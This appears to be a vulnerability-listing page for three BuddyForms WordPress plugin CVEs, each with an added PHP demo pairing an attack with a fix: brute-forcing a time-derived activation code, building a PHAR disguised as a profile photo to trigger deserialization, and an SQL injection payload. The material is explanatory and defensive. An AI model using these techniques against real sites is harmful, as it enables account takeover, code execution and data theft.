
CVSS: 6.5 | EPSS: 0% | CPEs: 1 | EXPL: 0

The BuddyForms plugin for WordPress is vulnerable to email verification bypass in all versions up to, and including, 2.8.9 because the account activation code is generated with insufficient randomness, so an attacker can guess a valid code instead of receiving it by email. This makes it possible for unauthenticated attackers to bypass the email verification step.
• https://plugins.trac.wordpress.org/browser/buddyforms/tags/2.8.9/includes/wp-insert-user.php#L334
• https://www.wordfence.com/threat-intel/vulnerabilities/id/a5c8d361-698b-4abd-bcdd-0361d3fd10c5?source=cve
• CWE-330: Use of Insufficiently Random Values
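The page does not show how the plugin derived its activation code, only that it was insufficiently random. The following is an added example, not BuddyForms code: it pairs a hypothetical time-derived code (the shape of construction CWE-330 warns about) with an attacker loop that recovers it by enumerating a few seconds of signup time, and then the CSPRNG-based replacement plus a verification routine with expiry and constant-time comparison. Function names, the user ID and the timestamps are constructed for the demonstration.

```php
<?php
// Added example for CWE-330 (not the plugin's own code).
// Run: php activation_code_demo.php
declare(strict_types=1);

// Hypothetical weak scheme: the code depends only on the signup timestamp
// and the user ID. Both are known or guessable by the attacker.
function weak_activation_code(int $user_id, int $signup_time): string
{
    return substr(md5($signup_time . ':' . $user_id), 0, 12);
}

// Attacker side: the attacker triggered the signup, so the timestamp is
// known to within a few seconds. The search space is the time window,
// not the 48-bit hex string. Returns the recovered timestamp, or null.
function guess_weak_code(int $user_id, int $approx_time, int $window, string $target): ?int
{
    for ($t = $approx_time - $window; $t <= $approx_time + $window; $t++) {
        if (hash_equals($target, weak_activation_code($user_id, $t))) {
            return $t;
        }
    }
    return null;
}

// Hardened: 128 bits from the OS CSPRNG. Inside WordPress,
// wp_generate_password(32, false) draws from the same source.
function strong_activation_code(): string
{
    return bin2hex(random_bytes(16));
}

// Server-side check: reject expired codes and compare in constant time so
// the response timing leaks nothing about the stored value. The caller
// should also invalidate the code after one successful use.
function verify_activation(string $submitted, string $stored, int $issued_at, int $now, int $ttl = 86400): bool
{
    if ($now - $issued_at > $ttl) {
        return false;
    }
    return hash_equals($stored, $submitted);
}

// Demonstration with constructed values.
$user_id = 42;
$signup  = 1700000000;                                  // victim's signup time
$code    = weak_activation_code($user_id, $signup);
$found   = guess_weak_code($user_id, $signup + 3, 10, $code); // attacker is 3 s off
printf("weak code %s recovered at t=%s within 21 md5 calls\n", $code, var_export($found, true));

$strong = strong_activation_code();
printf("strong code %s (%d bits of entropy)\n", $strong, strlen($strong) * 4);
var_dump(verify_activation($strong, $strong, $signup, $signup + 60));        // true
var_dump(verify_activation($strong, $strong, $signup, $signup + 2 * 86400)); // false: expired
```

The point of the loop is that the effective key space of a time-derived code is the attacker's uncertainty about the clock, not the length of the string; a 12-character hex value falls in a handful of hashes. The strong variant has no such structure, so the only attack is online guessing against 2^128 values, which rate limiting on the verification endpoint makes irrelevant.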

CVSS: 9.8 | EPSS: 0% | CPEs: 1 | EXPL: 1

The BuddyForms WordPress plugin, in versions prior to 2.7.8, was affected by an unauthenticated insecure deserialization issue. An unauthenticated attacker could leverage this issue to call files using a PHAR wrapper that will deserialize the data and instantiate arbitrary PHP objects, which can be used to perform a variety of malicious actions provided a POP chain is also present. A second description of the same issue: the BuddyForms plugin for WordPress is vulnerable to deserialization of untrusted input via the 'url' parameter in versions up to, and including, 2.7.7. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to call files using a PHAR wrapper that will deserialize the data and instantiate arbitrary PHP objects, again usable for a variety of malicious actions provided a POP chain is also present. It also requires that the attacker succeed in uploading a file containing the serialized payload; this is easily achieved by uploading a fake profile photo before launching the attack. The two descriptions differ on whether authentication is required.
• https://www.tenable.com/security/research/tra-2023-7
• CWE-502: Deserialization of Untrusted Data
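The mechanism the advisory describes, as an added example that is not the plugin's code: an attacker builds a PHAR whose metadata is a serialized object, uploads it under an image extension, and then supplies a phar:// URL to a parameter that reaches a filesystem function. The gadget class, file names and the vulnerable and hardened functions are all hypothetical stand-ins; a real POP chain would use classes already loaded by WordPress or the plugin. The script must be run with phar.readonly disabled to build the archive.

```php
<?php
// Added example for CWE-502 via phar:// (not the plugin's own code).
// Run: php -d phar.readonly=0 phar_demo.php
declare(strict_types=1);

// Stand-in gadget: a destructor with a side effect. Real chains use existing
// application classes; this one only writes a marker file.
class LogWriter
{
    public string $path = '';
    public string $data = '';
    public function __destruct()
    {
        if ($this->path !== '') {
            file_put_contents($this->path, $this->data);
        }
    }
}

// Attacker side: serialize the gadget into the PHAR metadata, then give the
// archive an image extension so a name-based upload filter accepts it.
function build_phar(string $out, string $marker): void
{
    $tmp = $out . '.phar';
    @unlink($tmp);
    @unlink($out);
    $phar = new Phar($tmp);
    $phar->startBuffering();
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->addFromString('x.txt', 'x');
    $g = new LogWriter();
    $g->path = $marker;
    $g->data = 'destructor ran from unserialized metadata';
    $phar->setMetadata($g);
    $phar->stopBuffering();     // manifest, including metadata, is written here
    $g->path = '';              // disarm the local copy so its own destructor is a no-op
    rename($tmp, $out);
}

// Vulnerable pattern: a request-controlled "url" reaches a stat-family call.
// On PHP < 8.0 the phar:// wrapper unserializes the archive metadata during
// file_exists(); PHP 8.0 and later no longer do this automatically.
function vulnerable_fetch(string $url): bool
{
    return file_exists($url);
}

// Hardened: allowlist the scheme before any filesystem or HTTP call.
// A substring check for "phar://" is not enough (case, whitespace, other
// wrappers); parse the scheme and compare it normalized.
function safe_fetch(string $url): bool
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException("refusing scheme '{$scheme}'");
    }
    return true; // hand $url to wp_safe_remote_get() or similar from here
}

$file   = sys_get_temp_dir() . '/avatar.jpg';
$marker = sys_get_temp_dir() . '/phar_demo_marker.txt';
@unlink($marker);
build_phar($file, $marker);

vulnerable_fetch('phar://' . $file . '/x.txt');
// true on PHP 7.x: the gadget ran although the code only asked whether a
// file exists. false on PHP 8+, where phar:// access no longer unserializes.
var_dump(file_exists($marker));

try {
    safe_fetch('PHAR://' . $file . '/x.txt');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";      // refusing scheme 'phar'
}
```

Two caveats a tester should keep in mind: the wrapper does not care about the file extension, only about the `__HALT_COMPILER()` stub, which is why a renamed "profile photo" works; and the PHP 8.0 change removes the automatic trigger but not the underlying problem, since `Phar::getMetadata()` and any explicit `unserialize()` on attacker data remain exploitable with a suitable chain.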

CVSS: 9.8 | EPSS: 0% | CPEs: 1 | EXPL: 0

The buddyforms plugin before 2.2.8 for WordPress has SQL injection. The Buddyforms plugin for WordPress is vulnerable to SQL injection in versions up to, and including, 2.2.7 due to insufficient escaping of a user-supplied parameter and lack of sufficient preparation of the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL to existing queries, which can be used to extract sensitive information from the database.
• https://wordpress.org/plugins/buddyforms/#developers
• https://wpvulndb.com/vulnerabilities/9829
• CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
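The page names neither the query nor the parameter, so the following is an added, generic illustration of the pattern the advisory describes rather than the plugin's code: a value that is trimmed but not escaped is interpolated into a `WHERE` clause, and the same lookup is repeated with a bound parameter. It runs against an in-memory SQLite table through PDO so it is self-contained; the table, columns and payload are constructed, and the `$wpdb->prepare` line in the comment is the WordPress-native equivalent for a hypothetical table name.

```php
<?php
// Added example for CWE-89 (not the plugin's own code).
// Run: php sqli_demo.php   (needs the pdo_sqlite extension)
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE form_entries (id INTEGER PRIMARY KEY, form_slug TEXT, author_email TEXT)');
$db->exec("INSERT INTO form_entries (form_slug, author_email) VALUES
           ('contact', 'alice@example.test'),
           ('contact', 'bob@example.test'),
           ('private', 'admin@example.test')");

// Vulnerable: the request parameter is interpolated after a cosmetic
// sanitizer. trim() is not an SQL escape, and even a correct escape would
// still be weaker than binding.
function entries_vulnerable(PDO $db, string $slug): array
{
    $slug = trim($slug);
    $sql  = "SELECT author_email FROM form_entries WHERE form_slug = '$slug'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: the value travels as a bound parameter, never as SQL text.
// WordPress equivalent (hypothetical table name):
//   $wpdb->get_col($wpdb->prepare(
//       "SELECT author_email FROM {$wpdb->prefix}form_entries WHERE form_slug = %s", $slug));
function entries_prepared(PDO $db, string $slug): array
{
    $st = $db->prepare('SELECT author_email FROM form_entries WHERE form_slug = ?');
    $st->execute([$slug]);
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

$payload = "x' OR '1'='1";                      // constructed attacker input

print_r(entries_vulnerable($db, $payload));     // all three addresses, including the private form's
print_r(entries_prepared($db, $payload));       // empty: no row has that literal slug
print_r(entries_prepared($db, 'contact'));      // alice and bob only
```

The injected string turns the predicate into `form_slug = 'x' OR '1'='1'`, which is true for every row, so data from a form the caller should not see is returned alongside the rest; with `UNION` the same hole reads other tables. The prepared variant sends the query shape and the value separately, so the quote characters in the payload are data and the predicate stays a plain equality test.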